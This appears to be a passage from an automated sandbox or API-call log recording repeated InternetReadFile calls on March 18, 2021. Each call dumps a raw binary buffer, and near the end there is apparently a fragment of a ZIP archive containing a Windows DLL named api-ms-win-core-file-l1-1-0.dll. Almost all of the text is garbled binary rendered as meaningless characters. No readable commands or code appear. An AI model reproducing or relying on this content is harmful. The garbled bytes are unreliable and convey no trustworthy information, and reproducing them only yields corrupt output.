<Äéûx$¹¹`yÍGü[â±°!ë@âIï¾Ö$ÂÇ)BÄÉ¼ä:è^$=È÷ fä·A.dYCÈ²¬IJºb N0HZ¤mÒN Ýfë x¤³©çïëO jÑ8ùAßß¹k8²x ú$ÍTÉr¬õô^{]g)ÿªMÉ¹CT7¨íÏ×½dU·î%¢(&Ü·yl´¢ä{á n¤K`üÝ½~^Õ?^S²íZC÷ÀÿÂ²@\|JY¥xúý`´7¯nô~y}8¢4 ;`Tð<¢ DbÃ`:Bç¦@CJZIJFTÃyª 2È±ÂÒ `@²Æ!7]Ü`h;Êè^®0þZä?KÓ¹'yÄÍ1 ÙópÎ&Ss=\8xtj Ã7Á`ádVHJ6¸ d!U¨Ùhm\B¼ aID6s»`;ä%QhÙ6y»áC=(@\|P Þà ·ÚlßÛ-½ýqhÊTKäç`ÀÈJ FANQVÁªn¨±ÿdô -© ¡a¢EVküZÞA^8<JÛB¥ca¼ÔÖQDcµµäÐ2ZJPhuB¼¿æí0Á Q" ²-ÕFfgÔ{j§Î¨y¼_\j:ÿxó¾y³È9býÙOíõ±-{ú¤BÐmÇ6u^bÒ$°kÛPÙâ}¶zr&(²ô»¬\|ëÞ±kìm\WoÐu*ÊkÚ¸þÄ'Üaç¿Ð^¿ request_handle: 0x00cc000c	1	1
InternetReadFile March 18, 2021, 12:06 a.m.	buffer: ¨ª(Ì0È§'öb¹»¾oN$CÜÑäxÞ%(HÏ»HtNØ Ã!ph»?<ó"¥þðæ§±HãõÛL\|èOÐ½û²µv¬@p§;ìJÉô¢Á®6HG´;>»!{l¬<2×ka^L2ñÆU¥D:ð÷VPtÕ¸·ü1L£Hy±ÕGaFSÂÈ¬¦±ßªÿ)äØO}N ¼qóò×Å=ÙQaíOZrÆC½JìcåLÞ²nI<H³©æZï& ¦ýà©4hÍ´» Û+¯´IY¢Qø\|YÔ;Ã>a]vôôB &ÛéeAÇÒÙÑÇMxwâvã4¯À¬ZÊÝØî³®9¶-¾4ü¨Ø¯Lô¦e»í~rÿØ«ðÆSÈåí¨× ×ø ß¶Íæ¢;½ êª2s¹§^ênÄ;«^½@Ñ;Ù¸éú¾k®½Cô×¼ïpK×ßu)¶¼kS½ûzª<=ÁÃê¹ÑÔ¬Nôº¿ÒHØj¾CïøfÜ°_¦EeùÛg ´Ihi6 ;,ÊËIºÊºb° hVI-+SB»b18´»¨QrÃzü]vªlñÆUs!ìèûÒÿ\:dÔhP ÊÿçÓÉ?ð&@Éz¨ö59¹\·ÈèSbR\|Èò¹»ª¦èÊàHk}©Åûý¼yQSÜe¨¾MÅ8¿ò;Èx°ô5EÁåùåÍVº¶[?]Tó»Mò9×ø=W)MEÍi,ýy/²%EYæ'o0PââTöÒ+[^ßQ]-{üÜg W:.Ú çvÉCC9&&H³U3±¾Õ¯½miC¬^wY<ÀÒoïqÌÔîtó'læØsQ0ø9VÿýìLªë§á£"}"ÖQêoï_>zK@¤ÒùÇ´![¶È^LIóíY9pÿÍÄQ@>Ô+P4W)@"Òv=9AonH>D?`ìád° ¸ +â'Dü ¨ÊcAYCz5+·Z#Uÿu¼þ+(\|ËènéYuwè `Zº`í5®ý¼³ÉÖ¤¤8l¿ÎoN]+â_\Ä9%ÑÎ¡Ã¥<Øfu°~?õä IÎú¾©^w=jLäN½_mpí õóÃO}9R·§<UýaÓÍ·[ÿcTw\|Ú§×$ãm;t¦uõ8<,[yëøîZ¹Úà?yÞAÉ¾Þ}®8mÏ¥1÷»+rGUn+6µ4´¥µ¦\aa3d=wËÜaþÜËþ£t;ÃÆëu3ßl»øî¨ÂÑ¹ùC¯Î÷&þ@v.D£B·n°3mË:AéûEBâ;öýþ$üC¦ãwi×ýÑº=y¬ÀÑÕ«K%õÃ³Ywÿ§Ù-dµ±®¡<+óB¸?àMcÏF!cÓÀØS`lò7åH!ÀØXPeýVp;æoej /íè"ej!íóp õ#HyüAõoÃá ,?Å·ám4'ÀªüÈ1W$T#½cç²öFü®ïw-07á½xÔ]öøjÓÇË4gJ§?É®Hl;Æ:2\ßYÒ2$[Ò[ý¸õH.ðÊHtdZøüÉÌÄóûÆü<.öBÜÓÇ.¸éxR©)ó§\|ã9ZÔÏ=c¬)Î÷>&ÒAÈx¯§5kQz ôþúHåèò¸ªûØæ¦bÖsNig«?U¯Wûù§.õqú}³Óîßjv5qYQ_Ë-»¸½K½j8Ð¥tñúå¼ÇÒ¹§ç&/0kg»]¯ðN¤¼§°Sm¬O ;j.nÒh¯ç3la_½,h $`óÐ¹è0.Èñgºõ¨È}P.³¬0×ó¹}-íQËËLÏ=Øcâ»^Æçj¶·o¬ïeH>¸ö®SìqÕï¥"v$ì¼°gH§Éõ×Ö§÷.¼57§0o~N74¥IÓÅ6$d!(«üXÀE¾áøz2®ÉE'eùÕ¯dàZÇ4Dð¢_($j$J°3=sQNõr6ÿT/3/FýÝæØpÕ~NnS>Å´l~61%Còï8UÌ«èY\ïé¡sQxvjÛ{UuMLÑfêFëzáÝfð3>8¿lHM¢ Ö¾Dé3ú¤¹O(+=´ Cdüv!rìöoÃõ"<"û\¹IúÿãôÆàRú¸ÿ<zÜ9'zÞ.ÓbQ«'Ã_éÜpLAüéUºäØ²¼Å¹cIÂõµÊÀyg[}½údXÙÖÍçm>îKº«E»ÝuR¡ãûÉÛ÷ók%Î<GS¬ò[¨ÊY¨öh6Ý]yÏ¿úÌCu~«´¯C.'®)}êîC+ÁâÊÖóÝOmQÐ¯r ÇÇÓ]ÿÜú \|wÈ¡åö¡#GÌv/Å¾æä0;¾½PÖye¸$ò~Ð{Á´pOÇæ}Â¡g3íÅ²]çyß¦WH!r¤bjºNùdë]´vJ»Ò:N½ÛÚ ?5¦´x«å6³Õv êÈ29µ¦vkKâ^º-q·Æö!eê¶åÙô@"Ö7¥#PÌ&Ñ¾¯;)fCA$^8ñû0S¦¤[7f(&Â$!ÝBûFÚ7k¬ÚÑ"`¿?ÀÊÎø±À>X Pçeòl(f¶ßäÛß¹{%Niw¿þÈÉíoY¬9ó°8l./¶º(¶êß~ÓR+#QÐÖ@+)@Qðß{Ó2ÈØ¹¶Ákk·îÚÒÄJ][økÁbdäåäÖ][¨KªûþIEAáUIùþ(Ïö÷Û>Úp#ÛQËl§ç¢½S} ÌÝÅ´1þóÔ>/mNMwF\Ãn¨zH:Lo¶Cb¶hðp§ñ= aKÚçÚÚL3ÎZjÑ?3ªV¤®ÔìM)}ÚuÏëÅÞ¯vÆÚ:ëÎÚê%`ò\<O:ÅZw¦j¸{nw[ÀÖfîÅ>eÝ1>aOV<·À+î¦®å»¿oQ¶ -;¢i¤nÖÅC©ê=ïq®}àýC/#Ymåf÷JÐb¦_S¼~Zn,÷êÛÌûÊo¤µ;?÷Ê½®Ö¢I¸¿\{»U{÷ö Ñºc; idðOÛn·íG0'>hEíÓåiñ²÷·úÿímÙ±%Mó¿È·¥=lÆ0ØÜ¡P9S/X9q®cs«b°äë?XÙØäÑêÓ7ÿf:¢îÞ\¡ÅÚ)_KjI3¢6ëçÇ:æYu¨«kd¿räXq\ÜÃ!!lm@x¯ÉÜr¥>º9zVa¿½ïlfä®æÀE&yéÈXÜßá{>¶í @maAåÎ)Dqz²xíõ/È ³Ø]b_¬®H½>$SãêÕc£þvæA¦Çc+>®Ñ½M»èNMrí v;%à'§°@y)zºÏsþrù§Î5Ó¦'Õår!5ãª«b²QU"#îsõÜìDöJ)Ù_¤<ÂÈþËyö¬çzY1Mïø~ÜôÀ`¾ÝAjWMùëf¾7ª¢í8½±Ov^Zx?àâ^Û~¦T©f²¹ý9ñþ>ß\u<?æ3O¢¥RÃË«Ì½BvPf Ç÷ËH±Ïß¶Xh)5~¹µº¼¤'½â¼fAk'QÂ¢DV!ø¸5èsÏ<"ÍsOà]UÙ+måÓ¦ÁÏò5Y y¿¶ièz ÞþÒ1jô¡~·ÉÛ3ü\Òµ¶RïòLå^¾§ãí®< ÇOýÛKùÇNÉ¯ õY¡çHD4lø2Æ§Æé=À<ùô)ûùôùw!}ãY¬8ßþÌ\|àü7þyN½>%}§( ?¯Êàá~gitLpÌ¨!÷ÞuËêdãý[>ë·öµGåöÜõ´=%½dCy¶Põ,Àé6º_Ibæ±¶{ïX¨¾¬^ºp°ªêrã`x¶e&.G¾_çä¥£iàª>æî>pùëË¡¤®tB,Ëç¬µY+ßz½È¡èájµ/:6_GÁñ4ànÞÞUÑßäd¥þ5_jç`©xÞ[Ý[>û:RJ+R©T0Ä½¨SÈíGÑ%IòÜ'iÅ©ç?÷(E!ïï-üRk¥~ýì,×¦ÇAÂáD#Éöõs$Å5ßO¥É#²²ÚGg#Õ«óºr´øDÊ<\~ulýhý Õû!wùO.Àûç¼ð_½¾±,V±3s¥îªÒpFXÐ/;g4"È§\|¸8nç.Ít#hðúzòÒ×iL÷t)7ËâFÅè/ð®¡&/÷ö¬mQÚ7k_w5-zÊ¶ìQÛ%lÕÑO7ü Wi1^+ßÏN¼i´8EPoè¹©oÔr?8Î«õÖí~Z"z>Ô¯³t9k÷õËúJj%®Ï¥Z4ô}uÓÆÀ¸ãT¼yöDÜ¹´Xè:JhÛ=[ë+¸W±¯çõå¶ÜûÏÚO¼8éËhãrÖ¿U#3cb?#e ñôVò¡Þ¶bâÈ©;¹QùDD(Hï&îùÿ½áA-4ï{ u`T1g®ûOüRÍPf×ç¼Ø0öVQl [ý¯LÒØÒ<I¬¼¼ZVKF%§ÅW')øã$Q¡x7ÊÈ%Öòtóýé5èÐ½ r2}ýd1Xý:A\#¡àïq&Fz¤]c@rg©¡8¤¿RÄÀáz«ÍÒ¤fù á¤\|Ì·9lÍ£]cÀ>ä¿þÿ`Ì¯þ¿§õaò7ï0ûLLiý¦ñ¾ request_handle: 0x00cc000c	1	1
InternetReadFile March 18, 2021, 12:06 a.m.	buffer: ÇÇÄ9æ¥1âÒìF@³%,3õAÝ\|í\|ÍË¾!Ó¦@Å,W¡òSùk(¶D§,í%®Ä/8°SÝ-¡wa2@£[å3É"G8c8;éòÚh3ú¡vÓ×Û/Ñ¢»Í2bwªË]+<c3XS]ù)¢Ê8»eB3ºý3÷íâú3ÙMëNôÈ¶»µ/Î¬)D[UØn3¦óîýÛ7# B jÕÖYS8Ñx©"òúÔáctÓÃ& ÚÇ9´òßM&¦Iùgó}Z?{àÙ!²è(ÐYT'YáfShÞ9÷ò¤õ@6\WGÎi¦ïü}20_Æ1:éý¢¤Pæz«4þpfÿÂÏk%ðÇÞíÚVÓóÌzüNxú:Ç6En§TÃÃèëe :ëß°qñ;»2n1¼gI2õgá0Qß½Ñ ØóÞ¯½áUàI¨còù ö³Ý'=IÅJ¯Ñr<ÏÊkgÊÕ<Ésä¹ñ,ØÝgºôîßãyqYyïÌS¡¹¥_8$5ÊFçDëÕÐ9ëã5L.j½2y})4â£ÿúÐ0åÀXÁ1}¶2÷E3nÙÝõ4Â»Ó4%½RÓÚ=Ê>¿Æ1gªð\|W³º&ÔH/æüÈ'vu·Ï}\Ö õÀWý®ýmÕë>³5T¿×ðYôÎNf;ÃV©lFÿ I$ÓÒAøýv¿¹½¨ø½þÀoPT!ÄVU)ø¡fåAJösöÿ½ó üÊö¤Híöå}V7<Òi.jVÖ5°ÎDõMÏé£2b¤ëµLã2<Æ¯r>Ãè\|Ç#ë^%Ò±Î² 3¦;nËí;1=ã¹^f>òÅ~&'Dqí>ëv3ÜÙyáÎE-dáÜ)¿TÏèá.&ÜÛ '+Y`jeÁ<ùâsäHØ÷Þ<ñyÏãÆïùtã=ý¿E¥î<`¾»äF3ÇGïÑÆn+Û{]·÷µUøWX}<Àê½¾2(ªWsmwA0\Öýts\j¼J`Mùülv¬Kd»åâMS#i½ÏA9ýÐû~ðèÍ¶½! Æf,oì0öÐ¯á·ÀÈåo7O2[DwÁ¶üâ2£`Û:Yü¿õÿçéíø&GÒÀËÊ²°þ®scX¹,)ÈÁã\×õÈäjÙûkü]«mà·MPf»4mj.Øf&K( >xçÕfØáëÉ4§p\¦çRF_òéix~lV.ñò¨Hàó£á²kfék×8ìËHL«.PÍñD7³L¸:nåÎ8Ú:LÇëÀlÅ¨KZ'Õã962ºzXÍ3ir0ºYQzçÉúÉÚ(&Èû8¢ð°½&ïèãaäd¹ÛÇñAíªí%´Ü¹øsëñÇüJUî¨?»nëÆ·ÙhÃø\ÛÔýÈSL·djºµ/Í½ª):CR¬6i]+Ê¤fd¯§ÍY{éÒEcÏÖ<Åá\.Ðc\kíN¾Ö\á;Ú/¥_ÖÌtÈÜ12s²°~{j0óDû¦ºXI-ûPáúlr¤åårõÄPJBÇ©ú³úSk`ý¾>5oMmó¨;!°o;\}Á.¹zTx¬êb»[e¸%Í}MY³ÒcÃÏ]ÊOá{²#DD{ï$^ÿvo»ðIAÓ¶¬7C³0\|@"ST«wësÂÄéã],Íù}ËÝkÅíÛÆqrCDdÉpÛ?w^þuÔä{9?öå¸¶l¿óêP4$À÷\]ÊE9®4Db P³1æß]t®ìrúNà9ãÖâå Ú·&õYf`3;åp3-e/KEOE¢I¨c3Vµ±·±±wÁ{`ñX¬E°¢:ä~ï¹ ùb1"¿\|òÃÛÔoy7Á= ,ø§IGGmÜgnÂÔ¤GT7&ÕÁnp ÌÊå*)jÖñ»îª_= request_handle: 0x00cc000c	1	1
InternetReadFile March 18, 2021, 12:06 a.m.	buffer: Àº\@àï¶SÉ×± º,T´3Íµ¯dØ¯êåäé}â$ôµëü[Þ§ßé!Tö6#êJ4è{ø;h×Û½ ïàèX\|rN¾=î£è³£f®ßfÕùH¸óüàî±ê<Ö×^ÚÄydÚV:FÇµpáTìùê(®áÆbWîÙyO:¿Èlxó!hOyûëi§sÈgªjîÐÉü8ÎØt£·^~ÜjfÆÃòs÷$î{1Ä5p7¢WbB / d¸Ø÷y¥Åá\jÉÿ±Ã¯ßa¬²ãàºÕfÌôýµêü[ §SÅªòhÿ+®Æ\|¸piàØü\î»çÈ0b+%JéL?v}&OõWÁlÛNû²¶¥¨îFÙ\êVÀ±¾ØËÃ]ùº± ^@Ó/evÃ©å5;üÝÝ\| Ôä¾@aHu¢§46¯ÍÝ¢¢lÝye4uÁ¦Öúz¤½)?WÆÌ]Õ³×u÷u©¶LZÚÖJ¥=ÐÚÔHf·ËM\÷÷bo8Ò(Ómà_Þc»#ó£û-9Ôý-þ»jÖ!O[]Ë4·ØdlðD÷áU¯ûÌ:W¸Ø£2¶Z_T?Ðc@Ô2´,V9=tÿKhôTîCÆÛLß®~M ºOàÃ½×£Ù¢µ·ÕG%Îõuï¡)É"Û¾/N$CÙÑ~xß%" D)ï»X)tN0áH8´Ü@ÇÞyQÂK¿}çù©-e¡Ücâc»=`©Û,ÕÉN¹ðlK²=Ú,Of"dFè8>½zl¢ö.xfgQL1ÉêYeDÚó·÷PbÉ¸~Ó(J\léUQÆbU1òK!dì·ì¿#\|õ=÷Qó/©W®MzÝ½¯ zûÕýÖ¯ûXEÓÃÂ/×nI<Àð9b«ký«@,Xñ½§êx5ëBB¯o@i3=«T£Øéó÷íúét¢§fDµë8Ïøünl>nb;7¤ydÕò÷©õª`{ó\sl[}÷iútm-±_ -HÏu5ßq¿sAòIXcÊ%äü&Ô`C¥ ÑËVÉé\t·7ëÉæúUs¹äÜ>CÒ½Dç-ÏÐÄ7±Ô°^Þ]é:0ÂìXéÝ$Ì'WÔ£izÓ¾åæàëòô«GÆ¯§u£Wð» .Å;Ä)ñoÆNûe8YBA°=yÄxxãçÁ9ìýËádyPEIQÚUÁUQVAã±ªòhy¼ÚÁ£ÝåAeª»"ÖãÌóy§ÈÀvhR5#LÅ>[úß'S £A¥ÿ~8ùÞ$è`²âÁAà§uM .×Í±¸FÇï³\|äÂ½EKbqx¬¾7îÅý"j}þ'DáGÔk¾ó¨§Å{xÄ¾ îSÜË²·4ÅNWXöaËJÏvÃ§³[ýnÐåÉ5ybÏ[ÊPQ3kË¼çnëB OQÅÑ+lc´Äk¯×©ùéÃM[f§Ïß{dÊÿlÀ>.z{ÎÇûFrLMW¦1[hNÄúVzÛ2[ï½ì2·#¸'ÞÞã©#×íæOââÙyV$ü-Ö0É~úÝ1×O5bÅ¥[¯ÔxÙ$jRv0KBcòiG¶© )\NMóí_ÜÓùbò ÏÌâ Á?iA2Òv%8ÁlaDÝD?`ìþ¿d° ¸+ÿøAPTÂ FÆP\ÊR²ÿ8^ÿ¾dq7ð¬º9²Àå+µöÐyÔÝlkZRºÛ_÷Ú=ÕÊ"Á¹9<yçnòNý8>µKÆjo}ý¬ôMéuW ·\|¹è{î6& ë¬Þ^yþQÇþ¾<Ç6¥vIl}õü«BM¯ÀÃR²½ñ5v[?©#µK_Ú¬72¥gØÀãaÙ¶¾Nà¦« ñçUqÂàSÅi;ÏméìÈCT¹Ý«àlmh= ÁhM÷jåuÌZE£µ§®[8\|8Õ7tÉ ìA¼~/ÛÕñ³oú i[¥rD×;éðq (ßæñI4>éãáÚv§ @á¤§¿H\|Ç¾_âÐ#ÿéøCd5Âõ~´¾<^èèêÕ£~ìÃÃ®¬u7ÿ§Ù-dµ±.£+ÿßB¸ßð&±'(B£±i`l üM9²06T_é ãÆü¶+³írînÁrÚf89w¼KIÖäj\|k±(U_£9fWåGõ¹" å;å/²ðÔoÝdQÀ\hùHomL7FÞä¯6»'2Ïp¢\|üÂ¢Ìñ´µc£õÝõ©# %ý±ÕOëw.EG¤Áï¿\|Ôi"ÈïRØh/Ê7tÆÕ\×~d«`ê'0§UUãÔCKÂÇ¼DR;H/ ôµ§q¥7XAïè¯wÅQþ.÷Òõ>&2Þ ¡êæý§T Ú]üép¼·O?pi¬;Ç:äö jùÅÄmæEY~W¶ñ±x<\|Ò°§Ç0ðìå²¢¾ÏçS O%¼:Ã¦ív¹Â;ö^Â®u[Ç{#çà¢èfÍÛõFÜoËs¢çE¶ puèÁE?Ñ{·_=Xñ½ÚyË }g9ÒîfïËôÜMú¢ßó$$>g_½M\|cýÀä¤lôdånÉ{U;½?q#a§Å<»M/ÒXß5ûÒÂx&Æ4¾åÓ»Ã¯µzÖZH(]o/O"ïÓwM.j;ï$¨q!ß&2®%,~`=Úù±r¢f¢7ëCµc^ÎoègæÇh¼á Û3[Çg& -è!Ï!©Ê¾O©Ë¤É©âº>îòÐX?ºÔÃ.eû-Z"!6úFëz±æð>wyîõ5;L)¤sÖçùý§¢Yé!Í27tþç¥úiÿ4\ÿÖXåYäa<ØçCÈÄ (Òÿ?HäV;"H{W¯Èèi)$íýóD4¯jônGCùû9Ô¸wÏÎæü«Â%~MÎI¨1T\®«qvï1qÒÃ ^oö)®;?d:½~¹Ì§ËI'Ïêëlø6<´ý3ÎÜ%a³ôu={³(nÕîóü²íX;·ÊÎynûB^(ºçeÉö©F~Í7ÇL²Ò?¸mÕ}÷´sÀØfÞXI£¾JÏTµÇOBNE×&¦tv¸±^) v c']Ö$¨»d"°[à&ÀãÁÕyWpºÕ·nÝ4§õ2Æöhe[yb0ÏDG§Îq83'9s»CÿÞ<½ø<ë³]72:Ö) sèdíoJG 7C¢}wÌHëá0ÄÝ`2LiÅDØ OteÝ,³ÞkÇýÂîOAÆVbGk²Ö5¥èìYËBÿêâGYßÍkÓ7¾=ñ¹Nk×Ù ëÖq@+à[Ô« «¬ùÐ^Ãfòc«b«þé/-u°òJhyeM´ª2äÿµ/-óÉ,·¡£mt´µ[9Ú2ÄJQ request_handle: 0x00cc000c	1	1
InternetReadFile March 18, 2021, 12:06 a.m.	buffer: ¶ðÁÑÅÈ+)®m¡¬%îþ[$Å$ø]í¯lKÖÔ±Øz5ÏqüÃçhïc¾$K¶ÞbFÿåõn¯í2NÍMc.¡W¶xH;Lqá$!M~¾4.Ã»]@»rPõóþ½ÚÌ«Uè/i ¤>m$È'u×Üø ÛY/æµuÖ¶ÕOÀî$¹xuµ,ïN5Ji¸yjGaCß\BLÍSy½I1ÏµD>á¶»'¹ïXR² ); e¬aÞÃC»Å3úÇ DºÎ·w¶/Æ²ÚËÏLïbÄLõÐ½¼^q<\|ýÅj/ät®yâ^Wk@1¤wÎ×ÞhÓÙ±;Fcb¼r°}idø?l{Ý69Ày¯¹[¿YÞË>Þßê¶?ló©[Ê0ÿEg[ºçûÍ×·el B¨8Y piòTÇÌõná¯müyÁKÍm>O?¼ ¯»u&W\|d®öµ¯¥ ½´9Ygí«¸¤çµB;444³8ò,:ÎíäQÌ³ÞNz«ÅÖz¡>º%zZ9Ê~ëúéÌmG-¬<ä"bñKª\|Gou}lßluÄDÔº_#Óí6Ö^^@>ÌÃn\°º ÷õòØaùW§¬~ïº2=$-ú¸F4oc:1¬úw[ÛHaÿ¦j££Ò}ò¿û,gN`^åÑ±bÆô¢º\¾óH¸êªlTøû«Ùú=nvâ¬»dUmBÎÒ`Mä¾ærývÖ#ý¬æ;§ï¼z¶9áéR½KßE3ÁºwÏ§/0tE©fñúáãÎ$îqñ +½}¡TµæUËíGäJb§ÀLu<L0æ¢¥jC_ë«Ì]û7Ó?Ï@O]»ñÃ 9KIáÙÖR¾ Õå%ýé§µ Ûºy5æ¤²N²{÷jHØíOÝ"?dã¿%\|Á®êüµãfAî6[xÚ4ô7:YS¿Ãôå A^¹Ún[Ù·kòÍûÞ2H®ï½´GQþZRÿ=§äAÒ~ÃµÐó$#VýÅy&éýÀêîsþçÝçôÕÿf±´á\|û7êóoÜüÿtLkJ#~Ø²ÆÃ½éóóqVRqCîËÕïM¢¾è×wßÌí¿éi"÷Ù26ïä<áÅ©vº ÈÃm´±¶»p[ú¢?Ù[UUÖ8\|XØ¼z£4¤{ô¥£¾YÀeº§$4ÌÝ»§ìkßÈáw=éê¤XöûÖÖfí½ô"ÄëqÍ<o\|ÎùyË9%d ,¿õÆ¶ð¡f'+¯²Ã¥óß_7ê ßÛúÅ×¤ W]5:FÇ!ï"E¦ 7DVâ;Ê¸.èÃ~µ¨qdçf5¹V[Ó/çMórÞ#Kß^Ù§øA_ó}WÚ<¦ sp:B£º%¿'G[PX¼üÇÍåWÛÖÿpsæ½b·ÿÖæòÞ?Çÿìó`±ºqøÔ£}O¦3Ç<tÊxLD0_mqÁ6tc¸MðúzôÜïqL÷T)ûÜgÍçg¼ÀFZëù6eÉDê\I¬}rÈÕ¬èÑ1yÚ1«!¦Ñ'øK¸Z¥!nzí ÎçÅ©ròDCÿUýãÖýAq^m×o1ÑBºKç³v\.«0TÍÜº¦Äõl«f×ÙWïXºÓDwöcº7ÿNBdIÓ¹¹®ÇÓ«ØvÎ®õÑæm6ñõ¼<ÿÑÓ¶¯;*Ï request_handle: 0x00cc000c	1	1
InternetReadFile March 18, 2021, 12:06 a.m.	buffer: ~òñQ_ÞàÄí1.yÄ ë2&£Xh\|ôi°ÒwôeÉc)MwÙøPdDHï :îÃÿ^÷ PÂ÷×Ä.àVCY¼.×}§'IésÍHf×üØ0özQl [ýÒÄG$VII -¯ÖVÔÑÅH)òã Q¸¢eìLZkû¸ùþôNë]EÖ±~sý0Xyý A\&!àæï~&Fùd\f@9ÎÒC?pHáÃ×é/GdÈQV5Sâ1ßb T·5q÷sÁÊ³àÞ_ýqgÛäû/î5±ùLNJj_Ó\|ÃÜ¨%öõnÎãÊVÝÀ°!<½%Ã·òÅëÍ6Ï¶Ü½óõ«@±£DV§àDí¢MÏ§û£ï·é=â²â®²9]½øì8°i¯è+)ÁUº1eiç ¯ùOÖ $Ï³Ùº/¿Úî"ó>î¹÷yUµû®¯å/ÞYc÷¾ù¥f0;Ñt2$+JZ÷±JâqÏÙOÓ©×Â~}¯ètb7M·^¬ Î´ßbèod¹Þ³É_<14&»#gý!²ü S¨-þia¯öÒMªy¥o¿pëÐ¹ºdâ!\|:1døhá½£.¼ÔöÈðÛCÍñ2,È·:8¶æhÆâ_ï¢jê6íc: Ü´c6®r[Ò2óÎ~ð©ÊÑëÜ¬bgÆÄÞc»ÁØ0¶Éù«µÆf±1E{þT´Õ¶<}¤þ,v9_!¸'°$°Mü§-J;ãªy´P'J´?§êJºö«æL:e°¯ÌäÀIßzÚZ§os9K«öüøGb/º´\| XË>Ë\æ¸öÖæééÃ á±çG½N$yY5glô2!ðÎKv;ßsb:½ñ)¨Õt¿SÊTÄÿ#½¼FKT'_ÉV &Ù´MþÂ§ÓEØ¢wíú·¹k}ß)u!»W ÿæòôð¹íÊ0ÑÎ#ç'ò:Wµ9Û)íÇÎ¿ir^t>äZd.Gwý2DQjB+\¨µGg¸ûyLÞp²[·;UaÀÿPK'²MÇ%U,8Uapi-ms-win-core-file-l1-1-0.dllìyXW×ÀoP@ "hÄ²#¢H¸UdhÛ¾*U»¸ R©»V´uºTµkµ¯¨U±[_pÏLdû=Ï×çûç_rï9ç9sî½'3Ã±!Ä>}Bh?ÒaèóikÝû 5ÚkqÞe?-ö¼KRTÅÎ&XÎN+J5; g9 ¶TÁÄÙr¥÷ìÜÙÒÙÇïr«cë;áKµü©À£¾ÅËÖRßÅK5ýLJ(MÏ"í"¥ÑmU¾6ZDw±¢Y[¢nHsAÚÃÀ[d%j:Â4ò7^4ÈGåÀ¦y°M«çðÑÁµÈ:ýîùèôÁ6 ýïj\|ª¾m& òZéú6lR= cÃ&-ÒaÍÓ¬Í!éÆH²}ju PºB Ò?aöíñ¢;ªçù^¿áB4 äâl)G®âL8éJçdHe8GÆåp9g¶$M3ØF/OB"V5±´ôÝ¦M&IËDóàkìÈkL¥ìàºÝ0.éd-26>mÜæðIÆ5¼î]@>³Y ]ð-°¸4½ìÈrà"ð ·Gh6p¨:; XÝ`}8°øx°{ (U@ðà8BÞåÀ>à&ðØ¡L` p h:!4 l~lLö··@¯^0ùÀÀL`p ø¸÷?@!P <¬Ùùci@1p¸ ¸C^âi@9p xt¼xIÀàppüd[à=Ðräû[òâ$ÓíÀ-Àò¤s½ÀCÀòÌ¶¿ äf0ø¨z@n(N/?ÈX\kÈL_çrL~®tÈ+ÈÅÀàW6¹êh°Ï°Í9ê:"¨AV¨ì0kÔWØÒ,ØªvÈ9@9éQOäQ/Ôö¶ê\êÜQ?Ô @8ÈyÁ6à"òF>È F~°P BÁ(¢!°áÃQâ#DQ( E1hX»;S"!¾R-&ð('Iå8 \æÍó4Tð \¬ÆROW+¼pKC@Ô¦©¨Ù<C°µmäF#àR.Pªx®4]×ÊH#Àe¸ÑÉtm)d¥,GPæ(Ô J©Bmdll Mc2V.§»-(©BÂ)Uz¦ZQK%VdâqJµ4C.VK æ&H]P©uáúÚ´jG)ú[.D.¦Æ@®×Ú!©1 D«Ñ´e¨c¦[SZ )ßòÏMJ6Zd´u{"ÓFYWAö5mKMW%ËQeÎ#r22pB¥ci¨ÆÕ©jRãÂlqºî¥«%z³kJi,µ7@d4 s1!ÍÅò² ãnëöD¦(OÔ©Õ4-G«ôÝêD0ÖÚb"¨ö´Ç(2Z£yCÅ 7fÊ¦Y%N3¶§:íÈ©&M@ÜÜÓ/ºBmÒnl@ ©¶B,K«³âÄr\ aM´¥1ÌIR#kQPOc µiJyUfBÕQëM¦È4JrU#TSE¦éÈõ5Ã8t5 f) µi[Hpy69Æ¶úhe¨?®3SÚÏÖdúuz?ñIJãÝÈ'=KDÛÐÝB:²98gê.ÉP%ú§hhº§ÐiBø!Sã±VË¹&o%4Q¦"$ÄÕ I\|~ðzRa;ÕØÎH$jÇ\¤5o·N¶cÓ¬¢nu³g ×ïêNFhªfê ÛÉbT" ¶ Z5£2£µ§#kmêF¤'RÍmt«¾UÔÒÒ®+liGÃ.ÒM¡âÿzØ3åä{ÌÜàRó®¥P÷=Xó1áÉHRà3%B+Å£8èÇÀg´Éã³á£æm%<o¢ýÒì ¯¹P-!DjD )R Lð&E2gÊ@J°9LÙ`ð<Á0ùA½§k<+e#1ØçA4bèáïà)ü Ès°)k¬ÉO1H¤ÐR òúmÀöÜ@Em«'ïlè AOz#ãÎAiÐ@4± Ïô~<µçBä\x¶çÁõPm_ðÑ¨DOr¼¤Ù £Fq©qþP¾#+8'5u\L'bV«ª9Ròh-Ù&G9ÉÜW²ùnrÄó÷óç pð$ïV/ªS(>É+B(;¾ÙRÚ·6gÏÆ¯Éq¤é kÞwB$ÜJ@2ä¤$üã-×A®=rFó¨sáà<ÂµÑ¹gµí9E°.Èµç L¬lÜ¨ºIT ð)Ó[öæLôzWM§#,?ÄÝÜb`ÁÐÆÎ´ôÒü±è4× ³07ó°fÐÍknéaNcÒòýè4fi(9èHº`eÑg ÌEgÓvHuåÌ²øOXý®ï[jË¿\o7ËgÇò[KtÎòp[y:~9÷é%T±Î-ÑÌ )TDQLs}ËÂº,KX7¯j¥kYÂ¬¸D®TH¸½0'RbÉ²!M'eÍWÙJúåº`½I=Õ½UOþüqj±<ÀÇz9tæÆ0?®¯¿ßXèúët±ÿHd0KRoÅbÇó¹ý°¾^/_ ¿el0)äò"\|8<oÇßOàÃí¹j.ÈÉä q¼Ãòi}tL3C\|ZX4Kz>¶[J\îHc\vÆ÷Iuôz (n½unSQýÝn.ÅXÄúNïe»Þ%ýµâ)Ý¦nvýûÿ >¶##0ðHØÈªºêï'×_Ý%?X:³Ø½áÃèµ·Öo· P8ÕÕ_z¾e`ãñ¹ie&ªV$Ö±Úu!ùYL¸²iÍ0¿¼é=Ï¥Z+7Û í\·îË[W 